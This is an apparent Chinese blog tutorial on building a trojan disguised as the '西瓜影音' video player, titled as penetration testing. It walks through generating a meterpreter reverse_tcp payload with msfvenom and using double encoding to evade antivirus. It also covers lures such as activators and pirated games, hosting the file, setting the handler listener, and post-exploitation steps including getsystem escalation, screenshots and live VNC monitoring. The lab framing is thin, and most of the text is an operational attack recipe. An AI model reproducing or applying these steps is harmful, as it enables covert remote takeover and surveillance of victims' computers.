渗透测试-制作一个‘有吸引力的软件‘去获取电脑shell(功能很强大,有惊喜)

简介: 渗透测试-制作一个‘有吸引力的软件‘去获取电脑shell(功能很强大,有惊喜)

 目录

 

1.客户端渗透原理

2.实验环境

3.实战:使用msfvenom生成西瓜影音看片神器后门木马

1.生成西瓜影音.exe后门程序

2.在MSF上启动handler开始监听后门程序

3.展示一下强大的功能

1.查看权限并提权

2.查看文件列表

3.查看系统信息

4.截图

5.实时监控win7电脑

6.其他一些操作

1.客户端渗透原理

在我们无法突破对方的网络边界的时候,往往需要使用客户端渗透这种方式对目标发起攻击。

客户端渗透技巧,我们可以将软件伪装一下,比如说将名字改为:windows激活工具,盗版游戏,抢红包软件,西瓜影音等等,只要能够吸引目标去下载安装就可以。

平时我们去激活系统,下载的激活工具,即使它提示我们有病毒,但是我们还是会去下载,用的就是这个原理。

2.实验环境

一台kali,一台win7,两台主机是在一个局域网内。

3.实战:使用msfvenom生成西瓜影音看片神器后门木马

msfvenon是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。

1.生成西瓜影音.exe后门程序

使用一个编码器

image.gif编辑image.gif编辑

使用两个编码器

image.gif编辑

image.gif编辑

参数说明:

-a 指定架构如 x86 x64。x86代表32位,x64代表64位。32位软件可以在64位系统上运行。

--platform 指定平台,这里选择windows,通过 --| platform 可以查看所有支持的平台

-p 设置攻击载荷,我们使用windows/meterpreter/reverse_tcp,可以通过-| payloads查看所有攻击载荷

LHOST 目标主机执行程序后链接我们的kali地址

LPORT 目标主句执行程序后链接我们kali的端口

-b 去掉坏字符,坏字符会影响payload正常执行。

image.gif编辑

image.gif编辑

2.kali系统开启apache服务

systemctl  start apache2

image.gif编辑

3.在win7系统里下载刚刚生成的西瓜影音软件

 http://xxx.xxx.xxx.xxx/西瓜影音1.exe

 http://xxx.xxx.xxx.xxx/西瓜影音2.exe

image.gif编辑

4.我们可以通过下面这个网站来扫描一下我们生成的两个exe病毒检测结果。

网络异常,图片无法展示
|

image.gif编辑

扫描结果:

一个生成器

image.gif编辑

两个生成器

image.gif编辑

如图,可以看出,两个生成器被检测出病毒的概率小一点。一般,为了不让电脑把软件当成病毒给杀掉,最好使用两个生成器。

2.在MSF上启动handler开始监听后门程序

1.kali启动Metasploit软件

2.使用模块 use exploit/multi/handler,并查看需要配置的参数show options

image.gif编辑

3.建立payload

set payload windows/meterpreter/reverse_tcp

image.gif编辑

4.设置监听主机--kali  

set LHOSTS 192.168.1.53

image.gif编辑

5.开启run

image.gif编辑

6.在win7电脑里运行刚刚下载的西瓜影音软件。kali系统就建立了会话。

image.gif编辑

3.展示一下强大的功能

1.查看权限并提权

image.gif编辑

我们可以看到,此时是Administrator权限。一般电脑的权限分为:普通用户权限,管理员权限和系统权限。

输入help可以查看到有很多功能。其中一个就是getsystem。

image.gif编辑

输入getsystem,输入getuid,权限就变成了系统权限。

image.gif编辑

2.查看文件列表

image.gif编辑

3.查看系统信息

sysinfo

image.gif编辑

4.截图

(当前win7桌面)screenshot

image.gif编辑

存放在root目录下

image.gif编辑

5.实时监控win7电脑(惊喜)

run vnc

image.gif编辑

image.gif编辑

6.其他一些操作

shutdown 关机  reboot 重启  reg注册表相关信息

相关文章
|
11月前
|
JSON 测试技术 API
Apipost与Apifox测试功能对决,谁更适合开发者?
在API开发中,调试工具的选择至关重要。本文对比了国产工具Apipost与Apifox的功能差异,涵盖调试能力、环境管理、团队协作、文档生成、自动化测试等方面。Apifox在细节处理、协作支持及生态集成上表现更优,适合复杂项目与团队开发;而Apipost则适合基础调试需求。通过全面评估,开发者可依据项目特点选择合适工具,提升开发效率与质量。
Apipost与Apifox测试功能对决,谁更适合开发者?
|
11月前
|
人工智能 测试技术 项目管理
测试不再碎片化:AI智能体平台「项目资料套件」功能上线!
在实际项目中,需求文档分散、整理费时、测试遗漏等问题常困扰测试工作。霍格沃兹推出AI智能体测试平台全新功能——项目资料套件,可将多个关联文档打包管理,并一键生成测试用例,提升测试完整性与效率。支持套件创建、文档关联、编辑删除及用例生成,适用于复杂项目、版本迭代等场景,助力实现智能化测试协作,让测试更高效、更专业。
|
11月前
|
存储 人工智能 测试技术
用AI提升测试效率:智能体平台的「需求文档管理」功能上线啦!
霍格沃兹测试开发学社推出AI智能体测试平台,全新「需求文档管理」功能助力高效测试准备。集中管理需求文档,支持多种上传方式,智能生成测试用例,提升测试效率与准确性,助力迈向智能化测试新时代。
|
10月前
|
Java 测试技术 网络安全
Burp Suite Professional 2025.10 for Windows x64 - 领先的 Web 渗透测试软件
Burp Suite Professional 2025.10 for Windows x64 - 领先的 Web 渗透测试软件
428 0
Burp Suite Professional 2025.10 for Windows x64 - 领先的 Web 渗透测试软件
|
11月前
|
人工智能 自然语言处理 前端开发
深度解析Playwright MCP:功能、优势与挑战,AI如何提升测试效率与覆盖率
Playwright MCP通过AI与浏览器交互,实现自然语言驱动的自动化测试。它降低门槛、提升效率,助力测试工程师聚焦高价值工作,是探索性测试与快速验证的新利器。
|
11月前
|
测试技术
自动化测试登录后的功能
在自动化测试的时候,往往许多功能需要登录以后才可以进行操作的,在这里我介绍一种方法,在登录以后将Cookies信息存入本地文件,在测试登录以后操作的时候再从本地文件把信息调出来存入Cookies
203 4
|
敏捷开发 运维 数据可视化
DevOps看板工具中的协作功能:如何打破开发、测试与运维之间的沟通壁垒
在DevOps实践中,看板工具通过可视化任务管理和自动化流程,提升开发与运维团队的协作效率。它支持敏捷开发、持续交付,助力团队高效应对需求变化,实现跨职能协作与流程优化。
|
安全 测试技术 Linux
Flawnter 5.9.1 (macOS, Linux, Windows) - 应用程序安全测试软件
Flawnter 5.9.1 (macOS, Linux, Windows) - 应用程序安全测试软件
464 2
Flawnter 5.9.1 (macOS, Linux, Windows) - 应用程序安全测试软件
|
人工智能 安全 网络安全
Burp Suite Professional 2025.5 for Windows x64 - 领先的 Web 渗透测试软件
Burp Suite Professional 2025.5 for Windows x64 - 领先的 Web 渗透测试软件
663 4
Burp Suite Professional 2025.5 for Windows x64 - 领先的 Web 渗透测试软件